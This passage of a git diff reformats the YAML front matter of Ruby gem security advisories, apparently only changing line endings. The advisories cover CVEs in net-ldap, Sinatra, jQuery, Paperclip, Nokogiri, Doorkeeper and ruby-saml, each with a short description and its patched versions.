-    - https://github.com/ruby-ldap/ruby-net-ldap/commit/e4c46a223a19feda78393a793711353aa1febdcd
----
+---
+layout: advisory
+title: 'CVE-2017-17718 (net-ldap): No validation of hostname certificate in net-ldap'
+comments: false
+categories:
+- net-ldap
+advisory:
+  gem: net-ldap
+  cve: 2017-17718
+  ghsa: m7p8-9w66-9frm
+  url: https://github.com/ruby-ldap/ruby-net-ldap/issues/258
+  title: No validation of hostname certificate in net-ldap
+  date: 2017-12-17
+  description: |
+    The Net::LDAP (aka net-ldap) gem before 0.16.0 for Ruby has Missing SSL
+    Certificate Validation. The LDAP server's certificate was not verified
+    to match the host it was supposed to be connecting to.
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 0.16.0"
+  related:
+    url:
+    - https://github.com/ruby-ldap/ruby-net-ldap/pull/279
+    - https://github.com/ruby-ldap/ruby-net-ldap/commit/e4c46a223a19feda78393a793711353aa1febdcd
+---
diff --git a/advisories/_posts/2018-01-04-CVE-2018-5216.md b/advisories/_posts/2018-01-04-CVE-2018-5216.md
index a4e24423..d718d997 100644
--- a/advisories/_posts/2018-01-04-CVE-2018-5216.md
+++ b/advisories/_posts/2018-01-04-CVE-2018-5216.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2018-5216 (radiant): Radiant CMS 1.1.4 Markdown admin/pages/*/edit part_body_content
-  cross site scripting'
-comments: false
-categories:
-- radiant
-advisory:
-  gem: radiant
-  cve: 2018-5216
-  ghsa: mvw8-v767-qhjm
-  url: https://github.com/imsebao/404team/blob/master/radiantcms.md
-  title: Radiant CMS 1.1.4 Markdown admin/pages/*/edit part_body_content cross site
-    scripting
-  date: 2018-01-04
-  description: |
-    Radiant CMS 1.1.4 has XSS via crafted Markdown input in the part_body_content
-    parameter to an admin/pages/*/edit resource.
-  cvss_v2: 3.5
-  cvss_v3: 5.4
----
+---
+layout: advisory
+title: 'CVE-2018-5216 (radiant): Radiant CMS 1.1.4 Markdown admin/pages/*/edit part_body_content
+  cross site scripting'
+comments: false
+categories:
+- radiant
+advisory:
+  gem: radiant
+  cve: 2018-5216
+  ghsa: mvw8-v767-qhjm
+  url: https://github.com/imsebao/404team/blob/master/radiantcms.md
+  title: Radiant CMS 1.1.4 Markdown admin/pages/*/edit part_body_content cross site
+    scripting
+  date: 2018-01-04
+  description: |
+    Radiant CMS 1.1.4 has XSS via crafted Markdown input in the part_body_content
+    parameter to an admin/pages/*/edit resource.
+  cvss_v2: 3.5
+  cvss_v3: 5.4
+---
diff --git a/advisories/_posts/2018-01-09-CVE-2018-7212.md b/advisories/_posts/2018-01-09-CVE-2018-7212.md
index 6e4227f1..05e96204 100644
--- a/advisories/_posts/2018-01-09-CVE-2018-7212.md
+++ b/advisories/_posts/2018-01-09-CVE-2018-7212.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2018-7212 (sinatra): sinatra ruby gem path traversal via backslash characters
-  on Windows'
-comments: false
-categories:
-- sinatra
-advisory:
-  gem: sinatra
-  cve: 2018-7212
-  ghsa: h29f-7f56-j8wh
-  url: https://github.com/sinatra/sinatra/pull/1379
-  title: sinatra ruby gem path traversal via backslash characters on Windows
-  date: 2018-01-09
-  description: |
-    An issue was discovered in rack-protection/lib/rack/protection/path_traversal.rb
-    in Sinatra 2.x before 2.0.1 on Windows. Path traversal is possible via backslash
-    characters.
-  cvss_v2: 5.0
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "< 2.0.0"
-  patched_versions:
-  - ">= 2.0.1"
----
+---
+layout: advisory
+title: 'CVE-2018-7212 (sinatra): sinatra ruby gem path traversal via backslash characters
+  on Windows'
+comments: false
+categories:
+- sinatra
+advisory:
+  gem: sinatra
+  cve: 2018-7212
+  ghsa: h29f-7f56-j8wh
+  url: https://github.com/sinatra/sinatra/pull/1379
+  title: sinatra ruby gem path traversal via backslash characters on Windows
+  date: 2018-01-09
+  description: |
+    An issue was discovered in rack-protection/lib/rack/protection/path_traversal.rb
+    in Sinatra 2.x before 2.0.1 on Windows. Path traversal is possible via backslash
+    characters.
+  cvss_v2: 5.0
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "< 2.0.0"
+  patched_versions:
+  - ">= 2.0.1"
+---
diff --git a/advisories/_posts/2018-01-10-CVE-2017-12097.md b/advisories/_posts/2018-01-10-CVE-2017-12097.md
index ffba802f..0bc2982b 100644
--- a/advisories/_posts/2018-01-10-CVE-2017-12097.md
+++ b/advisories/_posts/2018-01-10-CVE-2017-12097.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2017-12097 (delayed_job_web): delayed_job_web ruby gem XSS vulnerability
-  via `queues` parameter'
-comments: false
-categories:
-- delayed_job_web
-advisory:
-  gem: delayed_job_web
-  cve: 2017-12097
-  ghsa: w7q9-xr2x-wh7x
-  url: https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0449
-  title: delayed_job_web ruby gem XSS vulnerability via `queues` parameter
-  date: 2018-01-10
-  description: |
-    An exploitable cross site scripting (XSS) vulnerability exists in the
-    filter functionality of the delayed_job_web ruby gem. A specially crafted
-    URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary
-    javascript on the victim's browser. An attacker can phish an authenticated user
-    to trigger this vulnerability.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.4.2"
----
+---
+layout: advisory
+title: 'CVE-2017-12097 (delayed_job_web): delayed_job_web ruby gem XSS vulnerability
+  via `queues` parameter'
+comments: false
+categories:
+- delayed_job_web
+advisory:
+  gem: delayed_job_web
+  cve: 2017-12097
+  ghsa: w7q9-xr2x-wh7x
+  url: https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0449
+  title: delayed_job_web ruby gem XSS vulnerability via `queues` parameter
+  date: 2018-01-10
+  description: |
+    An exploitable cross site scripting (XSS) vulnerability exists in the
+    filter functionality of the delayed_job_web ruby gem. A specially crafted
+    URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary
+    javascript on the victim's browser. An attacker can phish an authenticated user
+    to trigger this vulnerability.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.4.2"
+---
diff --git a/advisories/_posts/2018-01-10-CVE-2017-12098.md b/advisories/_posts/2018-01-10-CVE-2017-12098.md
index f904a7c1..10fc9a74 100644
--- a/advisories/_posts/2018-01-10-CVE-2017-12098.md
+++ b/advisories/_posts/2018-01-10-CVE-2017-12098.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2017-12098 (rails_admin): rails_admin ruby gem XSS vulnerability'
-comments: false
-categories:
-- rails_admin
-advisory:
-  gem: rails_admin
-  cve: 2017-12098
-  ghsa: pxr8-w3jq-rcwj
-  url: https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0450
-  title: rails_admin ruby gem XSS vulnerability
-  date: 2018-01-10
-  description: |
-    An exploitable cross site scripting (XSS) vulnerability exists in the
-    add filter functionality of the rails_admin rails gem version 1.2.0. A specially
-    crafted URL can cause an XSS flaw resulting in an attacker being able to execute
-    arbitrary javascript on the victim's browser. An attacker can phish an authenticated
-    user to trigger this vulnerability.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.3.0"
-  related:
-    url:
-    - https://github.com/sferik/rails_admin/issues/2985
----
+---
+layout: advisory
+title: 'CVE-2017-12098 (rails_admin): rails_admin ruby gem XSS vulnerability'
+comments: false
+categories:
+- rails_admin
+advisory:
+  gem: rails_admin
+  cve: 2017-12098
+  ghsa: pxr8-w3jq-rcwj
+  url: https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0450
+  title: rails_admin ruby gem XSS vulnerability
+  date: 2018-01-10
+  description: |
+    An exploitable cross site scripting (XSS) vulnerability exists in the
+    add filter functionality of the rails_admin rails gem version 1.2.0. A specially
+    crafted URL can cause an XSS flaw resulting in an attacker being able to execute
+    arbitrary javascript on the victim's browser. An attacker can phish an authenticated
+    user to trigger this vulnerability.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.3.0"
+  related:
+    url:
+    - https://github.com/sferik/rails_admin/issues/2985
+---
diff --git a/advisories/_posts/2018-01-18-CVE-2016-10707.md b/advisories/_posts/2018-01-18-CVE-2016-10707.md
index 9904def7..d75da2bc 100644
--- a/advisories/_posts/2018-01-18-CVE-2016-10707.md
+++ b/advisories/_posts/2018-01-18-CVE-2016-10707.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2016-10707 (jquery-rails): Denial of Service in jquery'
-comments: false
-categories:
-- jquery-rails
-- rails
-advisory:
-  gem: jquery-rails
-  framework: rails
-  cve: 2016-10707
-  ghsa: mhpp-875w-9cpv
-  url: https://nvd.nist.gov/vuln/detail/CVE-2016-10707
-  title: Denial of Service in jquery
-  date: 2018-01-18
-  description: |
-    Affected versions of `jquery` use a lowercasing logic on attribute
-    names. When given a boolean attribute with a name that contains
-    uppercase characters, `jquery` enters into an infinite recursion
-    loop, exceeding the call stack limit, and resulting in a denial
-    of service condition.
-
-    ## Recommendation
-
-    Update to version 3.0.0 or later.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 3.0.0-rc.1"
-  patched_versions:
-  - ">= 3.0.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2016-10707
-    - https://github.com/advisories/GHSA-mhpp-875w-9cpv
-    - https://github.com/jquery/jquery/issues/3133
-    - https://github.com/jquery/jquery/issues/3133#issuecomment-358978489
-    - https://www.npmjs.com/advisories/330
-    - https://github.com/jquery/jquery/pull/3134
-    - https://snyk.io/vuln/npm:jquery:20160529
----
+---
+layout: advisory
+title: 'CVE-2016-10707 (jquery-rails): Denial of Service in jquery'
+comments: false
+categories:
+- jquery-rails
+- rails
+advisory:
+  gem: jquery-rails
+  framework: rails
+  cve: 2016-10707
+  ghsa: mhpp-875w-9cpv
+  url: https://nvd.nist.gov/vuln/detail/CVE-2016-10707
+  title: Denial of Service in jquery
+  date: 2018-01-18
+  description: |
+    Affected versions of `jquery` use a lowercasing logic on attribute
+    names. When given a boolean attribute with a name that contains
+    uppercase characters, `jquery` enters into an infinite recursion
+    loop, exceeding the call stack limit, and resulting in a denial
+    of service condition.
+
+    ## Recommendation
+
+    Update to version 3.0.0 or later.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 3.0.0-rc.1"
+  patched_versions:
+  - ">= 3.0.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10707
+    - https://github.com/advisories/GHSA-mhpp-875w-9cpv
+    - https://github.com/jquery/jquery/issues/3133
+    - https://github.com/jquery/jquery/issues/3133#issuecomment-358978489
+    - https://www.npmjs.com/advisories/330
+    - https://github.com/jquery/jquery/pull/3134
+    - https://snyk.io/vuln/npm:jquery:20160529
+---
diff --git a/advisories/_posts/2018-01-22-CVE-2015-9251.md b/advisories/_posts/2018-01-22-CVE-2015-9251.md
index 69c964f1..89031969 100644
--- a/advisories/_posts/2018-01-22-CVE-2015-9251.md
+++ b/advisories/_posts/2018-01-22-CVE-2015-9251.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2015-9251 (jquery-rails): Cross-Site Scripting (XSS) in jquery'
-comments: false
-categories:
-- jquery-rails
-- rails
-advisory:
-  gem: jquery-rails
-  framework: rails
-  cve: 2015-9251
-  ghsa: rmxg-73gg-4p98
-  url: https://github.com/rails/jquery-rails/releases/tag/v4.2.0
-  title: Cross-Site Scripting (XSS) in jquery
-  date: 2018-01-22
-  description: |
-    Affected versions of `jquery` interpret `text/javascript` responses
-    from cross-origin ajax requests, and automatically execute the
-    contents in `jQuery.globalEval`, even when the ajax request
-    doesn't contain the `dataType` option.
-  cvss_v2: 6.1
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 4.2.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-9251
-    - https://github.com/rails/jquery-rails/releases/tag/v4.2.0
-    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#420
-    - https://github.com/rails/jquery-rails/blob/v4.2.0/vendor/assets/javascripts/jquery3.js#L9377
-    - https://github.com/advisories/GHSA-rmxg-73gg-4p98
----
+---
+layout: advisory
+title: 'CVE-2015-9251 (jquery-rails): Cross-Site Scripting (XSS) in jquery'
+comments: false
+categories:
+- jquery-rails
+- rails
+advisory:
+  gem: jquery-rails
+  framework: rails
+  cve: 2015-9251
+  ghsa: rmxg-73gg-4p98
+  url: https://github.com/rails/jquery-rails/releases/tag/v4.2.0
+  title: Cross-Site Scripting (XSS) in jquery
+  date: 2018-01-22
+  description: |
+    Affected versions of `jquery` interpret `text/javascript` responses
+    from cross-origin ajax requests, and automatically execute the
+    contents in `jQuery.globalEval`, even when the ajax request
+    doesn't contain the `dataType` option.
+  cvss_v2: 6.1
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 4.2.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-9251
+    - https://github.com/rails/jquery-rails/releases/tag/v4.2.0
+    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#420
+    - https://github.com/rails/jquery-rails/blob/v4.2.0/vendor/assets/javascripts/jquery3.js#L9377
+    - https://github.com/advisories/GHSA-rmxg-73gg-4p98
+---
diff --git a/advisories/_posts/2018-01-23-CVE-2017-0889.md b/advisories/_posts/2018-01-23-CVE-2017-0889.md
index c6bb39f9..6ddec908 100644
--- a/advisories/_posts/2018-01-23-CVE-2017-0889.md
+++ b/advisories/_posts/2018-01-23-CVE-2017-0889.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2017-0889 (paperclip): Paperclip ruby gem suffers from a Server-Side Request
-  Forgery (SSRF) vulnerability in the Paperclip::UriAdapter and Paperclip::HttpUrlProxyAdapter
-  class.'
-comments: false
-categories:
-- paperclip
-advisory:
-  gem: paperclip
-  cve: 2017-0889
-  ghsa: 5jcf-c5rg-rmm8
-  url: https://github.com/thoughtbot/paperclip/pull/2435
-  title: Paperclip ruby gem suffers from a Server-Side Request Forgery (SSRF) vulnerability
-    in the Paperclip::UriAdapter and Paperclip::HttpUrlProxyAdapter class.
-  date: 2018-01-23
-  description: |
-    Paperclip gem provides multiple ways a file can be uploaded to a web server.
-    The vulnerability affects two of Paperclip’s IO adapters that accept URLs as
-    attachment data (UriAdapter and HttpUrlProxyAdapter). When these adapters are
-    used, Paperclip acts as a proxy and downloads the file from the website URI
-    that is passed in. The library does not perform any validation to protect
-    against Server Side Request Forgery (SSRF) exploits by default. This may allow
-    a remote attacker to access information about internal network resources.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 5.2.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-0889
-    - https://github.com/thoughtbot/paperclip/commit/4ebedfbd11d20d03ed03a1274ed281eee62715d4
----
+---
+layout: advisory
+title: 'CVE-2017-0889 (paperclip): Paperclip ruby gem suffers from a Server-Side Request
+  Forgery (SSRF) vulnerability in the Paperclip::UriAdapter and Paperclip::HttpUrlProxyAdapter
+  class.'
+comments: false
+categories:
+- paperclip
+advisory:
+  gem: paperclip
+  cve: 2017-0889
+  ghsa: 5jcf-c5rg-rmm8
+  url: https://github.com/thoughtbot/paperclip/pull/2435
+  title: Paperclip ruby gem suffers from a Server-Side Request Forgery (SSRF) vulnerability
+    in the Paperclip::UriAdapter and Paperclip::HttpUrlProxyAdapter class.
+  date: 2018-01-23
+  description: |
+    Paperclip gem provides multiple ways a file can be uploaded to a web server.
+    The vulnerability affects two of Paperclip’s IO adapters that accept URLs as
+    attachment data (UriAdapter and HttpUrlProxyAdapter). When these adapters are
+    used, Paperclip acts as a proxy and downloads the file from the website URI
+    that is passed in. The library does not perform any validation to protect
+    against Server Side Request Forgery (SSRF) exploits by default. This may allow
+    a remote attacker to access information about internal network resources.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 5.2.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-0889
+    - https://github.com/thoughtbot/paperclip/commit/4ebedfbd11d20d03ed03a1274ed281eee62715d4
+---
diff --git a/advisories/_posts/2018-01-29-CVE-2017-15412.md b/advisories/_posts/2018-01-29-CVE-2017-15412.md
index 89225cbe..a9099c7e 100644
--- a/advisories/_posts/2018-01-29-CVE-2017-15412.md
+++ b/advisories/_posts/2018-01-29-CVE-2017-15412.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2017-15412 (nokogiri): Nokogiri gem, via libxml, is affected by DoS vulnerabilities'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2017-15412
-  ghsa: r58r-74gx-6wx3
-  url: https://github.com/sparklemotion/nokogiri/issues/1714
-  title: Nokogiri gem, via libxml, is affected by DoS vulnerabilities
-  date: 2018-01-29
-  description: |
-    The version of libxml2 packaged with Nokogiri contains a
-    vulnerability. Nokogiri has mitigated these issue by upgrading to
-    libxml 2.9.6.
-
-    It was discovered that libxml2 incorrecty handled certain files. An attacker
-    could use this issue with specially constructed XML data to cause libxml2 to
-    consume resources, leading to a denial of service.
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 1.8.2"
-  related:
-    cve:
-    - 2017-18258
-    url:
-    - https://usn.ubuntu.com/usn/usn-3513-1/
-    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-15412.html
----
+---
+layout: advisory
+title: 'CVE-2017-15412 (nokogiri): Nokogiri gem, via libxml, is affected by DoS vulnerabilities'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2017-15412
+  ghsa: r58r-74gx-6wx3
+  url: https://github.com/sparklemotion/nokogiri/issues/1714
+  title: Nokogiri gem, via libxml, is affected by DoS vulnerabilities
+  date: 2018-01-29
+  description: |
+    The version of libxml2 packaged with Nokogiri contains a
+    vulnerability. Nokogiri has mitigated these issue by upgrading to
+    libxml 2.9.6.
+
+    It was discovered that libxml2 incorrecty handled certain files. An attacker
+    could use this issue with specially constructed XML data to cause libxml2 to
+    consume resources, leading to a denial of service.
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 1.8.2"
+  related:
+    cve:
+    - 2017-18258
+    url:
+    - https://usn.ubuntu.com/usn/usn-3513-1/
+    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-15412.html
+---
diff --git a/advisories/_posts/2018-01-29-CVE-2017-16932.md b/advisories/_posts/2018-01-29-CVE-2017-16932.md
index dc965339..10985921 100644
--- a/advisories/_posts/2018-01-29-CVE-2017-16932.md
+++ b/advisories/_posts/2018-01-29-CVE-2017-16932.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2017-16932 (nokogiri): Nokogiri gem, via libxml, is affected by DoS vulnerabilities'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2017-16932
-  ghsa: x2fm-93ww-ggvx
-  url: https://github.com/sparklemotion/nokogiri/issues/1714
-  title: Nokogiri gem, via libxml, is affected by DoS vulnerabilities
-  date: 2018-01-29
-  description: |
-    The version of libxml2 packaged with Nokogiri contains a
-    vulnerability. Nokogiri has mitigated these issue by upgrading to
-    libxml 2.9.5.
-
-    Wei Lei discovered that libxml2 incorrecty handled certain parameter
-    entities. An attacker could use this issue with specially constructed XML
-    data to cause libxml2 to consume resources, leading to a denial of service.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.8.1"
-  related:
-    url:
-    - https://usn.ubuntu.com/usn/usn-3504-1/
-    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16932.html
----
+---
+layout: advisory
+title: 'CVE-2017-16932 (nokogiri): Nokogiri gem, via libxml, is affected by DoS vulnerabilities'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2017-16932
+  ghsa: x2fm-93ww-ggvx
+  url: https://github.com/sparklemotion/nokogiri/issues/1714
+  title: Nokogiri gem, via libxml, is affected by DoS vulnerabilities
+  date: 2018-01-29
+  description: |
+    The version of libxml2 packaged with Nokogiri contains a
+    vulnerability. Nokogiri has mitigated these issue by upgrading to
+    libxml 2.9.5.
+
+    Wei Lei discovered that libxml2 incorrecty handled certain parameter
+    entities. An attacker could use this issue with specially constructed XML
+    data to cause libxml2 to consume resources, leading to a denial of service.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.8.1"
+  related:
+    url:
+    - https://usn.ubuntu.com/usn/usn-3504-1/
+    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16932.html
+---
diff --git a/advisories/_posts/2018-02-18-CVE-2018-7212.md b/advisories/_posts/2018-02-18-CVE-2018-7212.md
index 2eb44330..fb0c9485 100644
--- a/advisories/_posts/2018-02-18-CVE-2018-7212.md
+++ b/advisories/_posts/2018-02-18-CVE-2018-7212.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2018-7212 (rack-protection): Path traversal is possible via backslash
-  characters on Windows.'
-comments: false
-categories:
-- rack-protection
-advisory:
-  gem: rack-protection
-  cve: 2018-7212
-  url: https://github.com/sinatra/sinatra/pull/1379
-  title: Path traversal is possible via backslash characters on Windows.
-  date: 2018-02-18
-  description: |
-    An issue was discovered in rack-protection 2.x before 2.0.1 on Windows. Path traversal
-    is possible via backslash characters.
-  patched_versions:
-  - ">= 2.0.1"
-  - "~> 1.5.4"
----
+---
+layout: advisory
+title: 'CVE-2018-7212 (rack-protection): Path traversal is possible via backslash
+  characters on Windows.'
+comments: false
+categories:
+- rack-protection
+advisory:
+  gem: rack-protection
+  cve: 2018-7212
+  url: https://github.com/sinatra/sinatra/pull/1379
+  title: Path traversal is possible via backslash characters on Windows.
+  date: 2018-02-18
+  description: |
+    An issue was discovered in rack-protection 2.x before 2.0.1 on Windows. Path traversal
+    is possible via backslash characters.
+  patched_versions:
+  - ">= 2.0.1"
+  - "~> 1.5.4"
+---
diff --git a/advisories/_posts/2018-02-19-CVE-2018-7261.md b/advisories/_posts/2018-02-19-CVE-2018-7261.md
index 5e4297af..b5f5d1a3 100644
--- a/advisories/_posts/2018-02-19-CVE-2018-7261.md
+++ b/advisories/_posts/2018-02-19-CVE-2018-7261.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2018-7261 (radiant): Multiple persistent XSS vulnerabilities in Radiant
-  CMS'
-comments: false
-categories:
-- radiant
-advisory:
-  gem: radiant
-  cve: 2018-7261
-  ghsa: gp82-xr77-88f4
-  url: https://github.com/radiant/radiant/issues/412
-  title: Multiple persistent XSS vulnerabilities in Radiant CMS
-  date: 2018-02-19
-  description: |
-    There are multiple Persistent XSS vulnerabilities in Radiant CMS.
-    They affect Personal Preferences (Name and Username) and Configuration (Site Title,
-    Dev Site Domain, Page Parts, and Page Fields).
-  cvss_v2: 3.5
-  cvss_v3: 5.4
----
+---
+layout: advisory
+title: 'CVE-2018-7261 (radiant): Multiple persistent XSS vulnerabilities in Radiant
+  CMS'
+comments: false
+categories:
+- radiant
+advisory:
+  gem: radiant
+  cve: 2018-7261
+  ghsa: gp82-xr77-88f4
+  url: https://github.com/radiant/radiant/issues/412
+  title: Multiple persistent XSS vulnerabilities in Radiant CMS
+  date: 2018-02-19
+  description: |
+    There are multiple Persistent XSS vulnerabilities in Radiant CMS.
+    They affect Personal Preferences (Name and Username) and Configuration (Site Title,
+    Dev Site Domain, Page Parts, and Page Fields).
+  cvss_v2: 3.5
+  cvss_v3: 5.4
+---
diff --git a/advisories/_posts/2018-02-21-CVE-2018-1000088.md b/advisories/_posts/2018-02-21-CVE-2018-1000088.md
index 2e832cfa..a7bad6ac 100644
--- a/advisories/_posts/2018-02-21-CVE-2018-1000088.md
+++ b/advisories/_posts/2018-02-21-CVE-2018-1000088.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2018-1000088 (doorkeeper): Doorkeeper gem has stored XSS on authorization
-  consent view'
-comments: false
-categories:
-- doorkeeper
-advisory:
-  gem: doorkeeper
-  cve: 2018-1000088
-  ghsa: hwhh-2fwm-cfgw
-  url: https://blog.justinbull.ca/cve-2018-1000088-stored-xss-in-doorkeeper/
-  title: Doorkeeper gem has stored XSS on authorization consent view
-  date: 2018-02-21
-  description: |
-    Stored XSS on the OAuth Client's name will cause users being prompted for
-    consent via the "implicit" grant type to execute the XSS payload.
-
-    The XSS attack could gain access to the user's active session, resulting in
-    account compromise.
-
-    Any user is susceptible if they click the authorization link for the
-    malicious OAuth client. Because of how the links work, a user cannot tell if
-    a link is malicious or not without first visiting the page with the XSS
-    payload.
-
-    If 3rd parties are allowed to create OAuth clients in the app using
-    Doorkeeper, upgrade to the patched versions immediately.
-
-    Additionally there is stored XSS in the native_redirect_uri form element.
-
-    DWF has assigned CVE-2018-1000088.
-  cvss_v3: 7.6
-  unaffected_versions:
-  - "< 2.1.0"
-  patched_versions:
-  - ">= 4.2.6"
-  related:
-    url:
-    - https://github.com/doorkeeper-gem/doorkeeper/issues/969
-    - https://github.com/doorkeeper-gem/doorkeeper/issues/970
----
+---
+layout: advisory
+title: 'CVE-2018-1000088 (doorkeeper): Doorkeeper gem has stored XSS on authorization
+  consent view'
+comments: false
+categories:
+- doorkeeper
+advisory:
+  gem: doorkeeper
+  cve: 2018-1000088
+  ghsa: hwhh-2fwm-cfgw
+  url: https://blog.justinbull.ca/cve-2018-1000088-stored-xss-in-doorkeeper/
+  title: Doorkeeper gem has stored XSS on authorization consent view
+  date: 2018-02-21
+  description: |
+    Stored XSS on the OAuth Client's name will cause users being prompted for
+    consent via the "implicit" grant type to execute the XSS payload.
+
+    The XSS attack could gain access to the user's active session, resulting in
+    account compromise.
+
+    Any user is susceptible if they click the authorization link for the
+    malicious OAuth client. Because of how the links work, a user cannot tell if
+    a link is malicious or not without first visiting the page with the XSS
+    payload.
+
+    If 3rd parties are allowed to create OAuth clients in the app using
+    Doorkeeper, upgrade to the patched versions immediately.
+
+    Additionally there is stored XSS in the native_redirect_uri form element.
+
+    DWF has assigned CVE-2018-1000088.
+  cvss_v3: 7.6
+  unaffected_versions:
+  - "< 2.1.0"
+  patched_versions:
+  - ">= 4.2.6"
+  related:
+    url:
+    - https://github.com/doorkeeper-gem/doorkeeper/issues/969
+    - https://github.com/doorkeeper-gem/doorkeeper/issues/970
+---
diff --git a/advisories/_posts/2018-02-27-CVE-2017-11428.md b/advisories/_posts/2018-02-27-CVE-2017-11428.md
index 37935acb..1014a96c 100644
--- a/advisories/_posts/2018-02-27-CVE-2017-11428.md
+++ b/advisories/_posts/2018-02-27-CVE-2017-11428.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2017-11428 (ruby-saml): Authentication bypass via incorrect XML canonicalization
-  and DOM traversal'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  cve: 2017-11428
-  ghsa: x2fr-v8wf-8wwv
-  url: https://github.com/onelogin/ruby-saml/commit/048a544730930f86e46804387a6b6fad50d8176f
-  title: Authentication bypass via incorrect XML canonicalization and DOM traversal
-  date: 2018-02-27
-  description: |
-    ruby-saml prior to version 1.7.0 is vulnerable to an authentication bypass via incorrect
-    XML canonicalization and DOM traversal. Specifically, there are inconsistencies in
-    handling of comments within XML nodes, resulting in incorrect parsing of the inner text
-    of XML nodes such that any inner text after the comment is lost prior to
-    cryptographically signing the SAML message. Text after the comment therefore has no
-    impact on the signature on the SAML message.
-
-    A remote attacker can modify SAML content for a SAML service provider without
-    invalidating the cryptographic signature, which may allow attackers to bypass
-    primary authentication for the affected SAML service provider.
-  cvss_v2: 6.3
-  cvss_v3: 7.7
-  patched_versions:
-  - ">= 1.7.0"
-  related:
-    url:
-    - https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
-    - https://www.kb.cert.org/vuls/id/475445
----
+---
+layout: advisory
+title: 'CVE-2017-11428 (ruby-saml): Authentication bypass via incorrect XML canonicalization
+  and DOM traversal'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  cve: 2017-11428
+  ghsa: x2fr-v8wf-8wwv
+  url: https://github.com/onelogin/ruby-saml/commit/048a544730930f86e46804387a6b6fad50d8176f
+  title: Authentication bypass via incorrect XML canonicalization and DOM traversal
+  date: 2018-02-27
+  description: |
+    ruby-saml prior to version 1.7.0 is vulnerable to an authentication bypass via incorrect
+    XML canonicalization and DOM traversal. Specifically, there are inconsistencies in
+    handling of comments within XML nodes, resulting in incorrect parsing of the inner text
+    of XML nodes such that any inner text after the comment is lost prior to
+    cryptographically signing the SAML message. Text after the comment therefore has no
+    impact on the signature on the SAML message.
+
+    A remote attacker can modify SAML content for a SAML service provider without
+    invalidating the cryptographic signature, which may allow attackers to bypass
+    primary authentication for the affected SAML service provider.
+  cvss_v2: 6.3
+  cvss_v3: 7.7
+  patched_versions:
+  - ">= 1.7.0"
+  related:
+    url:
+    - https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
+    - https://www.kb.cert.org/vuls/id/475445
+---
diff --git a/advisories/_posts/2018-02-27-CVE-2017-11430.md b/advisories/_posts/2018-02-27-CVE-2017-11430.md
index 1eb53609..1520c3cc 100644
--- a/advisories/_posts/2018-02-27-CVE-2017-11430.md
+++ b/advisories/_posts/2018-02-27-CVE-2017-11430.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2017-11430 (omniauth-saml): omniauth-saml authentication bypass via incorrect
-  XML canonicalization and DOM traversal'
-comments: false
-categories:
-- omniauth-saml
-advisory:
-  gem: omniauth-saml
-  cve: 2017-11430
-  ghsa: 94hm-8q65-rmxm
